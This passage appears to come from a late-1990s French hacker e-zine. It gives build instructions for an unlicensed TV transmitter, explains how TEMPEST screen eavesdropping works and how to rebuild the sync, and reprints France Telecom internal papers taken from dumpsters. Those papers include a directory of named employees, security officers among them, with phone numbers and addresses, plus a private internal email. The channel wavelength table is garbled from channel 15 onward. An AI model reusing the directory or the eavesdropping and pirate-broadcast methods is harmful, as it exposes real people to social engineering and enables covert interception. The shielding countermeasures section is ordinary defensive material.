pas responsables de vos actes. L' information n' a jamais tué personne.
Les actes, si.
INTRODUCTION
Ca vous dirait de vous faire une émission télévisée avec vous en vedette ?
Facile !(heu les hackers/phreakers, mettez un masque, c'est pas crypté :-)).
Mais ce n'est pas gratuit...
MATERIEL NECESSAIRE
Pour construire une Snow Box (le nom c'est pour la neige sur l'écran que
vous obtiendrez avant d'avoir trouvé les bons réglages), il faut :
- Un camescope ou un magnétoscope. - Un amplificateur linéaire
radioamateur 6 mètres (50 MHz) pour amplifier le signal audio-vidéo.
Il faudra choisir un amplificateur ayant une largeur de bande de 6 MHz
afin d'obtenir de bons résultats au niveau de la vidéo.
- Un modulateur HF (convertit un signal audio et vidéo en signal HF)
(pas obligatoire). - Une antenne dipôle 6 mètres.
- Du câble coaxial 75 ohms, des fiches HF, des fiches coaxiales 75 ohms
pour TV, 3 fiches RCA. - Un adaptateur péritel (dans le cas du
magnétoscope), pour récupérer la vidéo composite et l'audio.
MONTAGE
Voici le schéma de principe du montage : (photos non contractuelles !)
Le principe est très simple : le signal audio-vidéo émis par la source
vidéo est converti en signal Haute Fréquence à l'aide du modulateur HF.
Ce signal étant extrêmement faible, il est amplifié par l'amplificateur
linéaire de largeur de bande environ égale à 6 MHz (je sais ca fait
beaucoup, mais cela s'avère nécessaire pour un signal vidéo).
Pour ce qui est de l'antenne, si vous n'en avez pas de déjà prête,
vous pouvez en fabriquer une. Il faudra disposer, pour avoir un modèle
réglable (nous verrons plus loin l'intérêt), de tubes en aluminium de
faibles diamètres. Les diamètres doivent êtres complémentaires afin
d'obtenir des brins téléscopiques. On utilisera également un isolateur
en céramique (ou autre) pour la séparation des deux brins. La longueur
maximale de chaque brin téléscopique ne doit pas excéder 2,8 m pour
respecter l'ordre de grandeur de la longueur d'onde (ici, 6 mètres).
Le montage final est prévu pour émettre aux alentours des 55 MHz, on
peut donc émettre sur les canaux de télévision 2 et 3 sans problème.
Il faut savoir qu'il existe un réglage important pour une bonne émission
et surtout pour éviter de déteriorer les transistors de puissance
contenus dans l'amplificateur (ca coûte cher !!) : le paramètre qui
rentre en compte est le ROS (Rapport d'Ondes Stationnaires) aussi
appelé TOS (Taux d'Ondes Stationnaires) et vous en aurez forcément
à moins d'avoir énormément de chance (la taille de l'antenne, la
longueur du câble, l'impédance... rentrent en compte). Et là c'est
plus délicat, il faut disposer d'un ROS-mètre fonctionnant sur ces
fréquences pour le mesurer. Pour régler le ROS, il suffira alors d'ajuster
la taille des brins téléscopiques.
On peut modifier le montage, voire le simplifier : en effet, l'utilisation
du magnétoscope (mais là c'est moins bien à moins de disposer d'un camescope
possédant une sortie HF) permet d'éviter l'utilisation d'un modulateur
puisqu'il en existe déjà un dans le magnétoscope (le tuner). Ainsi, on
pourra fabriquer des antennes plus courtes si on travaille sur des canaux
VHF ou UHF, et directement prendre la source HF à la sortie antenne du
magnétoscope, pour la placer à l'entrée de l'amplificateur. Ce dernier
devra évidemment être un modèle adapté à la fréquence utilisée !
Pour vous faciliter la tâche au niveau des canaux et des longueurs d'onde,
voici un tableau les regroupant :
Canal Bande (MHz) / Longueur d'onde (m)
2 54-60 5.26
3 60-66 4.76
4 66-72 4.35
5 76-82 3.8
6 82-88 3.53
7 174-180 1.7
8 180-186 1.64
9 186-192 1.59
10 192-198 1.54
11 198-204 1.5
12 204-210 1.45
13 210-216 1.41
14 470-476 0.64
15 476-482 62.7
16 482-488 61.2
17 488-494 61.1
18 494-500 60.4
19 500-506 59.6
20 506-512 58.9
21 512-518 58.3
22 518-524 57.6
23 524-530 56.9
24 530-536 56.3
25 536-542 55.7
26 542-548 55
27 548-554 54.4
28 554-560 53.9
29 560-566 53.3
30 566-572 52.7
31 572-578 52.2
32 578-584 51.6
33 584-590 51.1
34 590-596 50.6
35 596-602 50.1
36 602-608 49.6
37 608-614 49.1
38 614-620 48.6
39 620-626 48.2
40 626-632 47.7
41 632-638 47.3
42 638-644 46.8
43 644-650 46.4
44 650-656 45.9
45 656-662 45.5
46 662-668 45.1
47 668-674 44.7
48 674-680 44.3
49 680-686 43.9
50 686-692 43.5
51 692-698 43.2
52 698-704 42.8
53 704-710 42.4
54 710-716 42.1
55 716-722 41.7
56 722-728 41.4
57 728-734 41
58 734-740 40.7
59 740-746 40.4
60 746-752 40
61 752-758 39.7
62 758-764 39.4
63 764-770 39.1
64 770-776 38.8
65 776-782 38.5
66 782-788 38.2
67 788-794 37.9
68 794-800 37.5
69 800-806 37.4
La propagation des ondes étant de plus en plus courte lorsqu'on
monte en fréquence, il est inutile de dépasser les 450 MHz.
De plus, l'antenne dipôle décrite ne suffira plus, il faudra
utiliser des antennes TV directionnelles (très précises,
déconseillées dans ce montage).
dafalgan : dafalgan@caramail.com
(¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯)
) TEMPEST ) 4.7 ( vatoo (
(_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_)
" Au milieu d' une petite rue, stationne une camionette a vitres teintees.
A l' interieur, une antenne pointe vers le ciel. Elle est dirigee vers
la fenetre du bureau situe au troisieme etage d' un immeuble. L' ingenieur
redigeant sa strategie prochainement mise en oeuvre contre ses concurrents ne
se doute de rien. Ce qui s' affiche sur son ecran est en cours de capture,
reproduit et enregistre dans le van qui se trouve a quelques metres plus
bas . . . "
I- GENERALITES
1. Signaux parasites
2. Compromission électromagnétique
2.1. Définition
2.2. Un mythe de Hackers?
II- RECEPTION DES RADIATIONS ELECTROMAGNETIQUES
1. Emissions électromagnétiques - Généralités
2. Capture des radiations électromagnétiques
3. Reconstruire la synchronisation
III- MESURES ET NORMES FRANCAISES
1.1. Compatibilité électromagnétique
1.2. Blindage
1.3. Limitation de la propagation par rayonnement
1.3.1. Utilisation d'une cage de Faraday
1.3.2. Aménagement de zones de protection
1.3.2.1. Zone de sécurité électromagnétique
1.3.2.2 Zone de couplage
IV- POUR EN FINIR
I- GENERALITES
1. Signaux parasites
Tout matériel ou système qui traite ou transmet, sous forme électrique,
des informations est sensible à des perturbations électromagnétiques temporaires.
Ces perturbations, qualifiées de signaux parasites, sont provoquées par les
variations du régime électrique, dans les différents circuits du matériel considéré
durant son fonctionnement.
Généralement les signaux parasites se manifestent sous la forme :
- d'ondes électromagnétiques qui se propagent par rayonnement dans l'espace
environnant ;
- de courants de conduction qui se propagent le long des différents conducteurs
reliés au matériel concerné.
La plupart du temps, il y a interaction des deux modes de propagation. Les perturbations
rayonnées provoquent des courants induits dans les conducteurs reliés au matériel ou
situés dans son voisinage tels que les lignes d'alimentation, les lignes de transmission
ou d'autres conducteurs (canalisation de chauffage, tuyau d'eau, fer à béton, etc...).
De même, un conducteur non blindé qui véhicule des perturbations peut se comporter en
antenne émettrice et, rayonne à son tour des parasites dans l'espace environnant.
Parmi l'ensemble des signaux parasites générés durant le fonctionnement des matériels,
il en existe qui sont représentatifs des informations traitées. Leur capture et leur analyse
sont peuvent permettre la restitution des informations. Ces signaux sont ainsi qualifiés de
"signaux parasites compromettants".
2. Compromission électromagnétique
2.1. Définition
La compromission électromagnétique peut se définir comme étant la révélation d'informations
confidentielles à des personnes qui n'ont pas à les connaître.
Cette capture illicite d'information est réalisée par l'intermédiaire des signaux parasites
compromettants. L'information représente le phénomène générateur et les signaux parasites
le phénomène résultant ; l'exploitation du lien entre les signaux parasites et l'information
traitée permet, à partir de la connaissance du phénomène résultant, de remonter au
phénomène générateur.
La corrélation, entre les signaux parasites compromettants et l'information, peut se
manifester sous différents aspects. En général, lorsqu'elle est traduite au niveau électrique,
l'information se présente sous la forme d'une succession d'impulsions, chacune étant
représentative d'un double changement d'état stable du régime électrique établi.
Ces changements d'états successifs provoquent, dans les différents circuits du matériel
considéré, des perturbations présentant des caractéristiques qui sont en
relation avec les impulsions elles-mêmes. Les perturbations peuvent prendre naissance,
soit durant le front montant de l'impulsion, soit durant le front descendant. Elles peuvent
également être générées à chaque front des impulsions. Si les informations sont exploitées
en mode parallèle, les parasites engendrés possèdent, en plus, une amplitude proportionnelle
au nombre d'impulsions présentes simultanément.
L'exploitation des perturbations, c'est-à-dire la connaissance de leurs positions relatives,
de leurs niveaux, permet de recréer des impulsions identiques à celles qui sont à l'origine
de ces perturbations et ainsi, révèle les informations qui sont traitées.
La capture et l'exploitation des signaux parasites compromettants dans le but de connaitre
des informations traitées sont la compromission électromagnétique.
2.2 Un mythe de Hackers ?
Le procédé technique nécessaire pour réussir la compromission magnétique ne demande pas de
grandes connaissances, ni de grands moyens financiers. Le materiel minimum est constitue
d'une antenne, d' oscillateurs, pour synchroniser les fréquences verticales et horizontales,
et d' un recepteur. Ce dernier peut être un téléviseur ordinaire, accompagné d'un
magnetoscope. L'enregistrement des informations interceptées et traitées permet une analyse
plus simple et plus efficace.
On peut avoir l'impression que tout cela n'est qu'un mythe de hackers.
Au cours d'une exposition, l'IUT d'Aix-la-Chapelle a expérimenté ce phénomène. Les
professeurs et chercheurs ont démontré qu'avec un simple téléviseur et environ 2000 francs
de matériel, la compromission éléctromagnétique était réalisable, aussi simple qu'un jeu
d'enfant. La distance entre la source des signaux parasites et le récepteur dépend de la
quantité des sources d'émissions electromagnetiques proches; elle oscille entre quelques
mètres et 1 km. Même le fonctionnement simultané de plusieurs machines (une salle info par
exemple) n'est pas une protection efficace. Il est possible d'isoler des signaux distincts
en provenance de 25 ordinateurs differents, situés dans un faible périmètre.
Les vieux téléviseurs soviétiques en noir et blanc sont un bon matériel peu coûteux pour
ce procédé. Etant donné que la réception était très mauvaise du temps de l'ex-Union
Soviétique, la population équipait ses postes de puissants récepteurs, capables de capter
des signaux très faibles.
II- RECEPTION DES RADIATIONS ELECTROMAGNETIQUES
1. Emissions électromagnétiques - Généralités
Concrètement, les câbles des matériels en fonction agissent comme une antenne pour
transmettre directement les signaux, ou reçoivent même le signal puis le ré-émettent
encore plus loin de la source. Il est possible que les câbles transmettent les signaux
de manière plus efficace que les équipements eux-mêmes.
Les plus forts signaux sont généralement entre 60 et 250 MHz, certaines exceptions
de signaux très puissants dans la bande TV peuvent atteindre 450 à 800 MHz.
La reconstitution des informations par compromission électromagnétique n'est pas
limitée aux ordinateurs et aux matériels digitaux, elle est efficace pour tous les
montages générant des radiations éléctromagnétiques.
2. Capture des radiations électromagnétiques
Les radiations émettent les informations sans synchronisation des lignes, à cause
de la résolution, du phénomène de réflection, des interférences, ou des variations
de tolérance des composants. Donc, s'il y a 3 différents signaux sur la même
fréquence, par réglage fin de la fréquence de réception, par manipulation de
l' antenne, et modification de la synchronisation des lignes, il est possible de
caler la réception sur chacun des 3 signaux séparément, et ainsi lire les
informations affichées à l'écran.
Par cette technique, il est possible également de distinguer les différents
équipements situés dans une même pièce.
Le signal reçu par le récepteur TV ne contient pas les informations de
synchronisation. Cela signifie que l'image affichée sur l'écran TV,
pendant la réception des radiations émises par une unité vidéo, va
osciller sur l'écran, dans les directions verticales et horizontales,
car les fréquences de synchronisation de l'unité vidéo et celles de la
TV ne sont pas les mêmes.
La qualité de la réception peut être améliorée en générant extérieurement
les signaux de synchronisation nécessaires, et les associer au récepteur TV.
Avec cette extension au récepteur TV, tout type d'unité
vidéo peut faire l'objet de compromission éléctromagnétique, à condition
qu'elle génère un niveau de radiation assez élevé. L'extension peut être
développée et construite par tout électronicien amateur en quelques jours,
je vous fais confiance pour cette partie.
Quelques moniteurs sont construits sur le même principe que les télévisions
en noir et blanc. Les oscillateurs de synchronisation libre dans un récepteur
TV peuvent parfois générer approximativement la même fréquence que celle
utilisée par le moniteur.
La compromission éléctromagnétique peut même s'appliquer accidentellement dans
ce cas.
3. Reconstruire la synchronisation
La méthode la plus simple et la moins coûteuse pour reconstruire une
synchronisation dans un récepteur TV est l'utilisation d'un montage incluant
2 oscillateurs électroniques:
-un oscillateur ajustable pour les fréquences 15-20 kHz, pour générer
le signal de synchronisation horizontale
-un oscillateur ajustable pour les fréquences 40-80 Hz, pour générer
le signal de synchronisation verticale.
Les 2 signaux peuvent être combinés et ajustés par le séparateur de
synchronisation du récepteur TV.
Il est bien connu que la relation entre les fréquences de synchronisation
verticales et horizontales est:
f(hor) = k * f(vert)
où k est le nombre de lignes affichées sur le moniteur.
Il est de plus pratique de seulement générer la fréquence de synchronisation
horizontale, et de calculer la fréquence de synchronisation verticale en
divisant f(hor) par k.
Une fois que le nombre de lignes a été déterminé, la synchronisation peut être
restaurée en ajustant seulement un oscillateur.
La figure 1 associée au mag (figure1.jpg),montre un dispositif de compromission
électromagnétique dans lequel ce type de resynchronisation est employé.
III- MESURES ET NORMES FRANCAISES
1. Compatibilité électromagnétique
La compatibilité électromagnétique (CEM), d'après la définition qu'en donne la
norme française NF C 98020, c'est l'aptitude d'un dispositif, d'un appareil ou
d'un système à fonctionner de façon satisfaisante dans son environnement
électromagnétique, sans produire lui-même des perturbations électromagnétiques
intolérables pour d'autres matériels, appareils ou systèmes.
La CEM résulte de la réduction et de la maîtrise des signaux parasites d'origine
électrique.
Le domaine couvert par la CEM est un domaine extrêmement vaste qui s'étend à
tous les matériels électriques, depuis les équipements industriels, scientifiques
et médicaux (ISM) jusqu'aux équipements domestiques. Il concerne également les
appareils de traitement de l'information (ATI).
Le domaine de la CEM s'appuie sur une réglementation émanant d'organismes
nationaux et internationaux dont les principaux sont :
- La CEI (Commission Electrotechnique Internationale) et ses Comités d'Etude ;
- Le CISPR (Comité International Spécial des Perturbations Radioélectriques) ;
- Le CENELEC (Comité Européen de Normalisation Electrotechnique).
La réduction des parasites s'obtient en grande partie par un choix judicieux
des composants. D'une manière générale, les composants à base de technologie
dite rapide, c'est-à-dire présentant des durées de commutation très brèves,
les machines tournantes et les alimentations à découpage sont à écarter car
génératrices de perturbations.
2. Blindage
La méthode pratique la plus efficace pour atténuer, voire supprimer, l'énergie
en provenance directe d'une source consiste à insérer un blindage entre l'organe
émetteur et l'organe récepteur (au sens large du terme). Un bon blindage doit
empêcher les signaux créés de sortir d'une enceinte ou les réduire suffisamment
pour qu'ils ne puissent pas perturber le fonctionnement d'équipements voisins.
De même, un bon blindage doit empêcher un appareil sensible de recevoir des
signaux indésirables qui l'entourent et qui nuiraient à son bon fonctionnement.
Si l'on place un blindage sur le trajet de l'énergie rayonnée par une source,
cet écran provoque un affaiblissement, de l'énergie rayonnée, qui est fonction
de l'efficacité de blindage et qui correspond à la somme des pertes par réflexion
et par absorption.
Ces deux éléments dépendent du type de rayonnement. La réflexion augmente avec
la fréquence en champ magnétique et diminue en champ électrique. L'absorption
augmente avec la fréquence, la perméabilité du matériau et son épaisseur.
3. Limitation de la propagation par rayonnement
La limitation de la propagation par rayonnement consiste :
- soit à confiner, artificiellement, les signaux parasites dans un
volume donné et prendre des mesures particulières pour qu'ils n'en
sortent pas. C'est le cas lorsque l'on installe les matériels de
traitement dans une cage de Faraday ;
- soit à aménager, autour des équipements, des zones dans lesquelles
des dispositions sont prises afin d'empêcher la capture des signaux
parasites compromettants. Les dimensions de ces zones sont déterminées
de façon que les signaux qui seraient captés en dehors de celles-ci
ne présenteraient plus une amplitude suffisante permettant leur
exploitation.
3.1. Utilisation d'une cage de Faraday
La cage de Faraday est une enceinte blindée, constituée de parois métalliques
sur ses six faces. Le blindage se comporte comme un écran électromagnétique
qui empêche la propagation des ondes électromagnétiques. Les points faibles
d'une cage de Faraday se situent au niveau des ouvertures qu'il convient de
traiter correctement afin de ne pas dégrader les caractéristiques globales
d'affaiblissement de la cage. Ces ouvertures sont essentiellement ;
- la porte ;
- les orifices, nécessaires pour assurer l'aération et la
climatisation du local ;
- les passages de câbles pour relier les matériels exploités dans
la cage avec l'environnement extérieur (lignes de transmission,
alimentation de la cage en énergie électrique, déport d'alarme, ...).
Toutes les liaisons traversant la paroi de la cage doivent être munies de
filtres adéquats. L'utilisation de fibres optiques pour acheminer les
informations hors de la cage est la meilleure des solutions car la fibre
optique est insensible aux rayonnements électromagnétiques.
La mise à la terre de la cage de Faraday s'effectue à partir d'un point unique
situé sur la paroi extérieure de la cage. Les matériels situés à l'intérieur
de la cage sont raccordés individuellement, directement sur la paroi interne
de la cage ou bien sur une barre de raccordement reliée à la cage.
3.2. Aménagement de zones de protection
Lorsque le matériel utilisé pour le traitement des informations n'est pas
installé dans une cage de Faraday, il y a lieu de l'entourer d'une zone de
protection qui comporte une zone de sécurité électromagnétique et une zone de
couplage. Au terme "zone" se rattache une notion de volume sphérique,
centré sur chaque équipement.
3.2.1. Zone de sécurité électromagnétique
La zone de sécurité électromagnétique est une zone dans laquelle des dispositions
permanentes sont prises pour détecter et empêcher toute écoute électronique,
activité de recherche de renseignements et mise en place de matériels d'écoute.
Il convient, également, que des précautions particulières soient prises pour
contrôler les mouvements des personnels, y compris des véhicules.
L'efficacité d'une telle zone croît avec sa dimension. Une distance de 100 mètres
est recommandée compte tenu des possibilités actuelles d'analyse des signaux
parasites.
3.2.2. Zone de couplage
La zone de couplage est une zone qui ne doit pas comporter d'équipement ou circuit
superflu (téléphone, intercom.) susceptible de capter par couplage des signaux
parasites compromettants provenant des équipements traitant les informations
sensibles ou des circuits acheminant ces informations. Les circuits qui sortent
de la zone de couplage doivent être filtrés et blindés. Dans ce cas, les filtres
sont placés en limite ou en dehors de la zone ; le blindage des circuits est
prolongé sur une distance minimale de trois mètres.
Cette zone doit être aussi exempte que possible d'objets susceptibles de se
comporter comme des conducteurs ou amplificateurs de signaux parasites
compromettants. Il est recommandé d'éviter l'installation des équipements
traitant les informations sensibles, à proximité d'objets ou mobiliers
métalliques (radiateurs de chauffage central, armoires,...), qui peuvent
amplifier les signaux parasites, ce qui accroît la distance de propagation.
Si ces objets n'ont pu être éliminés, leur continuité métallique doit être
interrompue par une isolation idoine placée en limite ou au-delà de la zone.
Plus la dimension de la zone de couplage augmente, plus la possibilité de
réinduction des signaux parasites par couplage diminue, plus l'aménagement
d'une telle zone devient difficile compte tenu des problèmes d'infrastructures
qui sont posés. Il est cependant recommandé de prévoir des zones de couplage,
centrées sur l'équipement, de 5 mètres de rayon au minimum.
IV- POUR EN FINIR
Ce type d'espionnage est en fait plus connu sous le nom de TEMPEST, terme
désignant aux Etats-Unis à la fois le standard de sécurité et la
compromission électromagnétique.
Cet article est le résultat de multiples recherches à partir de documents
américains (universités), français, de livres, et de textes gouvernementaux.
J'espère qu'il vous aura éclairé en ce qui concerne l'espionnage par
compromission électromagnétique, pour votre soif de connaissances, ou pour
la pratique. Si c'est le dernier cas, informez-moi de vos résultats
(vatoo@caramail.com ou cryptel@excite.com).
vatoo.
(¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯)
) Trashing REPORTS ( 4.8 ) Aaah@mail.dotcom.fr (
(_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_)
Bon alors la je dois dire que ce mois ci j'ai vraimment eu du mal !! :-)
Non sans déconner une fois j'ai pris la poubelle de la cantine (ct dégueu)
une autre fois le camion poubelle a piqué les sac sous mon nez meme pas eu le
temps de dire ouf et une fois y avait carrément pas de poubelles. Après des
assaults répétés, à force de super-persévérance, super Aaah a trouvé le
super SAC POUBELLE (il était temps :-) Et vous en communique les résultats,
pas tous quand meme parce que certains doivent etre exploité.
Bon alors pour commencer le NUMERO du mois !!!!!!! Hey oui voici un super
Numéro vert qui est tout simplement le Journal national de FT mis a jour
quotidiennement. Cette édition vocale et vaguement interactif avec les
touches de votre téléphone vaut vraimment le coup d'oreille
\\\ ///
(ô ô)
----------ooO-(_)-Ooo------------
| |
| 0800 04 19 96 |
| |
---------------------------------
S'en suit une petite BD sur la sécurité a l'interieur des batiments de FT :)
hehe alors elle est pas tres lisible parce que mal imprimé (dout sa mise à
la poubelle) mais on arrive a lire entre les lignes:-)
http://citeweb.net/cryptel/ezine4/bd1.jpg
http://citeweb.net/cryptel/ezine4/bd2.jpg
http://citeweb.net/cryptel/ezine4/bd3.jpg
http://citeweb.net/cryptel/ezine4/bd4.jpg
Un petit papier à propos de la derniere campagne télévisuelle de
FT. Vous savez le ptit garçon qui devient adolescent puis adulte et qui dit
bonjour a tout le monde. Ben voici dans un document interne les objectifs
de cette campagne
****************************************************************************
FRANCE TELECOM Diffusion Interne
N°736
Nouvelle campagne
de marque 1999
France télécom lance une nouvelle campagne de marque à compter du 1er mai
prochain, dans un 1er temps à la télévision puis au cinéma en juin.
Conjointement, des films sur les produits et les services de France Télécom
vont être diffusés.
> UNE VISION: "Un monde qui communique plus et mieux à toutes les chances
d'être meilleur"
L'ambition de cette campagne est de consolider la position de leader de
France télécom en l'appuyant sur 2 objectifs:
- un objectif commercial: l'accroissement du delta-minute en incitant à
de nouveaux usages
- un objectif d'image: la construction de la marque autour de l'idée
d'une communication plus riche entre
les gens. France Télécom veut
être la marque qui plus que tout autre, aide, incite, et donne envie
de communiquer plus et mieux
> LA COMMNICATION DE MARQUE 1999 se compose:
- D'un film "générique" dont le rôle est de porter "le projet de marque"
et ses valeurs pour renforcer l'efficacité des communications produits
- De films "preuves" conçus par les divisions qui ont pour objectif de
soutenir les offres produits et services. Les offres (ex: forfait
local, Top message, etc) sont ou seront traitées de manieres a montrer
en quoi elles sont nécessaires à la relation entre les gens
France télécom souhaite communiquer sur les valeurs de sa marque qui
sont la responsabilité, la proximité et la justesse de l'offre.
> MESSAGE DU FILM GENERIQUE
L'envie de communiquer est en chacun de nous, il suffit de le reveiller
Le message positionne France Télécom comme l'opérateur le mieux à meme
de faciliter la relation et d'accompagner les gens dans leur besoin de
communiquer. Il s'agit d'une invitation à retrouver la communication
naturelle, spontanée et confiante de l'enfance.
> QUELQUES HORAIRES du passage du spot TV:
- Samedi 1er mai à 20h35 et 22h30 sur TF1, à 13h25 et 22h40 sur France2
à 20h55 sur France3 et à 20h30 sur M6
- Dimanche 2 mai à 14h et 20h sur TF1, a 19h45 sur France
****************************************************************************
Voila ensuite j'ai trouvé un contrat de maintenance logiciel passé entre
France Telecom et un prestataire informatique. Les conditions imposées à
propos de la confidencialité sont assez costaud en voici des extraits:
ARTICLE 8 - CONDITIONS D'EXECUTION D'UTILISATION
Pour l'analyse d'un problème logiciel, France Télécom pourra autoriser au
cas par cas, les centre de support du cocontractant à accéder à ses systemes
informatiques pendant ses heures ouvrées. Chaque intervention demeure toute-
fois sous la responsabilité exclusive de France Télécom qui doit assuere la
confidentialité de ses données et doit se prémunir contre tout risque de
pertes desdites données. De plus, France Télécom nommera une personne
responsable (administrateur de son systeme informatique) qui assistera le
cocontractant pendant la durée des ces opérations et garantira un cadre
stable d'utilisation.
ARTICLE 16 - ENGAGEMENT DE CONFIDENTIALITE
Les parties s'engagent à garder strictement confidentielles toutes les
informations qui leur ont été fournies par l'autre partie dans le cadre de la
maintenance. Chacune des parties sengage à ne pas divulguer les techniques
et procédés de l'autre partie qu'elle serait amenée à connaitre du fait de
l'execution des travaux. Des que la solution à un problème est validée par
France Télécom, le cocontractant s'engage à detruire les informations
concernées ou à les lui restituer.
ARTICLE 17 - SECURITE
Dans le cadre des mesures prises pour assurer la sécurité des batiments et
equipements de France Télécom, les intervenants devront obtenir un laissez
passer pour avoir accès aux locaux nécessaires à l'execution des prestations
prévues au contrat. Les laissez passer seront demandés par le cocontractant
au Directeur du service concerné, ou à son representant. Les intervenants
devront porter sur le site un badge qui permettra d'identifier clairement
le cocontractant
****************************************************************************
Autre truc SUPER pratique les Glossaires. Pour comprendre leur jargon y a
pas mieux :
ALADIN: Affecttion Logique des Arcs De l'INterurbain
ALICE: Alerte sélective pour L'Information des Clienss sur les Evenements
réseau
ALICE GR: ALICE Grand Reseau
ALICE GR / BAHIA : Base Automatique et Hierarchique d'Informations d'Alertes
ALICE GR / GCRTR : Gestion Configuration du Réseau en Temps Réel
GEA : Groupe d'exploitation des Anneaux
GSRT : Groupe Supervision Réseau Trafic
IRONMAN : Application européenne FT/DeutshTelecom
SATURNE : Systeme d'Aide à la Télésurveillance utilisant les Renvois
Normalisés à l'Exploitation
SNRT : Supervision BLAGNAC
SPARTE : Supervision et Protection des Arteres du Réseau de Transmission et
des Equipements
SRG/PDA: Spervision Reseau General / Presentation Diffusion des Alarmes
SIDERAL : Application de tickets de derangements
****************************************************************************
Alors la voila un petite doc comme j'aimerais en trouver plus souvent :-)
C'est tout simplement l'annuaire de la DDE (Direction Délégué d'Exploitation)
Elle dirige 5 URN à travers la france
(¯`'·.¸ ¸.·'´¯)
( D.D.E IDF )
(_¸.·'´¯`'·.¸_)
TEL FAX
Directeur
Alain FONS 01.42.31.35.05 01.42.31.38.58
42 av de la Marne
92910 Montrouge
Pôle Technique
Jean Louis GUILLON 01.42.31.37.00 01.42.31.38.58
42 av de la Marne
92910 Montrouge
Pôle Gestion
Marie-Caroline MELLANO 01.42.31.37.76 01.42.31.38.98
42 av de la Marne
92910 Montrouge
Pôle Ressources Humaines 01.42.31.35.14 01.42.31.38.58
Regis MUSEUR
42 av de la Marne
92910 Montrouge
Pôle Qualité
Bernard FENET 01.69.11.41.21 01.69.11.41.09
42 av de la Marne
92910 Montrouge
(¯`'·.¸---*---¸.·'´¯)
(URN centre Paris)
(_¸.·'´___*___`'·.¸_)
Directeur Tel: 01.48.88.81.21
Marifée PONTREAU Fax: 01.48.88.81.20
33 rue Poncelet
75840 Paris cedex 17
Secretariat Directeur Tel: 01.48.88.81.22
Catherine ESPIAU Fax: 01.48.88.81.20
33 rue Poncelet
75840 Paris cedex 17
Responsable Qualité Tel: 01.48.01.72.00
Jacky LAMARCHE Fax:
Responsable Securite/Defense Tel: 01.48.01.71.03
Yvon MERCIER Fax:
Site Archives
Departement Pilotage de Gestion Tel: 01.48.88.81.30
Claude SENTENAC Fax: 01.48.88.81.20
Site Poncelet
Departement Exploitation Transmission Tel: 01.48.01.71.21
Thomas CESARI Fax: 01.48.01.71.09
Site Echiquier
Departement Administration des Reseaux Tel: 01.48.88.81.61
Serge BAUD Fax: 01.48.88.81.20
Site Poncelet
Departement Commutation Environnement Tel: 01.48.88.82.91
Elisabeth BAC Fax: 01.48.88.81.20
Site Poncelet
Departement Ile de France Tel: 01.42.31.35.39
Guy DAVID Fax: 01.42.31.34.95
Site Montrouge
(¯`'·.¸ ¸.·'´¯)
( URN NORD )
(_¸.·'´¯`'·.¸_)
Directeur Michel GUILLOUX Tel: 01.20.59.41.21
65 rue Faidherbe Fax: 01.20.59.41.29
59658 Villeneuve d'Ascq cedex
Secretariat Directeur Tel: 01.20.59.41.23
Madame SIGNE Fax: 01.20.59.41.29
65 rue Faidherbe
59658 Villeneuve d'Ascq cedex
Responsable Qualité Tel: 01.22.55.74.01
Jean-Claude DAMIENS Fax: 01.22.55.74.03
578 av du 14 juillet 1789
80050 Amiens cedex
Responsable Securite/Defense Tel: 01.22.55.72.01
Michel DELABY Fax: 01.22.55.72.02
Site Amiens
Departement Transmission Tel: 01.26.77.11.21
Francis DAUBILLY Fax: 01.26.77.11.09
7 bd Louis Bartou
51084 Reims cedex
Departement Administration des Reseaux Tel: 01.20.59.42.41
Jean-Pierre HOORELBEKE Fax: 01.20.59.41.09
Site Villeneuve d'Ascq
Departement Commutation Tel: 01.20.59.41.22
Jean-Pierre OLIVIER Fax: 01.20.59.41.09
Site Amiens
Departement DRH/Finance/Logistique Tel: 01.20.59.41.11
Marie-Claude ROGIERS Fax: 01.20.59.41.29
Site Villeneuve d'Ascq
(¯`'·.¸ ¸.·'´¯)
( URN EST )
(_¸.·'´¯`'·.¸_)
Directeur Jean Pierre MESSION Tel: 01.87.55.84.80
150 av Andre Malraux Fax: 01.87.66.74.92
57000 Metz
Secretariat Directeur Tel: 01.87.55.84.01
Marie-Jeune ARTS Fax: 01.87.66.74.92
150 av Andre Malraux
57000 Metz
Responsable Cabinet/Communication Tel: 01.87.55.87.43
François DELAITRE Fax: 01.87.66.74.92
150 av Andre Malraux
57000 Metz
Responsable Qualité Tel: 01.87.55.87.52
Marcel GACHENOT Fax: 01.87.66.74.92
578 av du 14 juillet 1789
80050 Amiens cedex
Responsable Securite/Defense Tel: 01.87.55.86.39
Jean Marie GAUNARD Fax: 01.87.66.74.92
578 av du 14 juillet 1789
80050 Amiens cedex
Departement Transmission Tel: 01.80.40.61.21
Gerard NEUSIUS Fax: 01.80.40.61.09
14 av Albert 1er BP 3118
21031 Dijon cedex
Departement Administration des Reseaux Tel: 01.83.58.51.21
Jean François MENUT Fax: 01.83.58.51.88
6 av Paul Doumer BP 213
54506 Vandoeuvre
Departement Commutation Tel: 01.88.10.41.21
Armand STIRN Fax: 01.88.10.31.29
1 rue Claude Chappe
67000 Strasbourg
Departement Pilotage de Gestion Tel: 01.81.82.71.21
Jean Pierre BRUNET Fax: 01.81.82.71.09
5 rue du Port Citeaux BP 472
25019 Besançon cedex
Il me manque l'URN Nord de PARIS et l'URN Sud de PARIS
****************************************************************************
Pour terminer je finirais sur une point d'humour des nos amis chez FT. Voici
un mail interne qui vaut son pesant de cacahuetes:
De: D. Rigolo
A: Gailho Marie
Objet: Marie au tableau !
Date: Jeudi 29 avril 17:55
Niveau de priorité: Haut
Il ne vous suffit plus de sécher les cour, il faut en plus que la derniere
leçon ne soit pas retenue ; Bon pour cette fois vous recevrez donc une double
punition:
1°) pour oser nous abandonner une fois de plus à notre triste sort pendant 2
jours
2°) pour avoir abimé la langue française en ajoutant une lettre au mot
"absence" qui n'avait rien demandé
3°) pour avoir ronchonné en lisant ce message
La double punition s'ajoute à la précédente qui était de copier 100 fois sur
papier rose bonbon le mot "absence":
En plus, merci d'apporter un gateau au chocolat à l'AQT des votre retour
